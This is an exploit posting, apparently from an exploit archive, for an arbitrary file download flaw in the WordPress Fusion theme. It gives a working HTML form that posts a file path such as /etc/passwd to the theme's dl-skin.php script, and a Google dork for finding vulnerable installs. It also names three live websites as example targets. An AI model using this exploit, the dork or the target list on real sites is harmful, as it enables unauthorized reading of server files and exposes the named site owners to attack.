Wordpress Theme Fusion Arbitrary File Download Vulnerability

2014-06-20T00:00:00
ID 1337DAY-ID-22354
Type zdt
Reporter Aloulou
Modified 2014-06-20T00:00:00

Description

This exploit allows attacker to download any writable file from the server#### Usage Info Put the path of the file in the file's field of the exploit ,then click "Download" button then you get the file directly

                                        
                                            ############################################################################
 
# Title : Wordpress Theme Fusion Arbitrary File Download Vulnerability   
 
# Author : Aloulou                                             
 
# Date : 19/06/2014                                                    
 
# Facebook : http://www.facebook.com/Aloulou.TN                               
 
# Email: [email protected]
 
# Vendor : www.wordpress.org                                                     
 
# Google Dork : inurl:/wp-content/themes/fusion 
 
# Tested on : Linux
                        
 
 
############################################################################
 

 
Exploit:
 
<html>
<body>
<form action="http://127.0.0.1/wp-content/themes/fusion/lib/scripts/dl-skin.php" method="POST">
<b>File</b>:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
<input type="submit" value=Download>
</form>
</body>
</html>



    
 
Examples:
http://brookeknollvillage.com
http://www.thegoldexperts.net
http://rdid.fr
 
# Greeting to : Tunisia ,  CyberPink , AnonBoy and All muslims

#  0day.today [2018-01-05]  #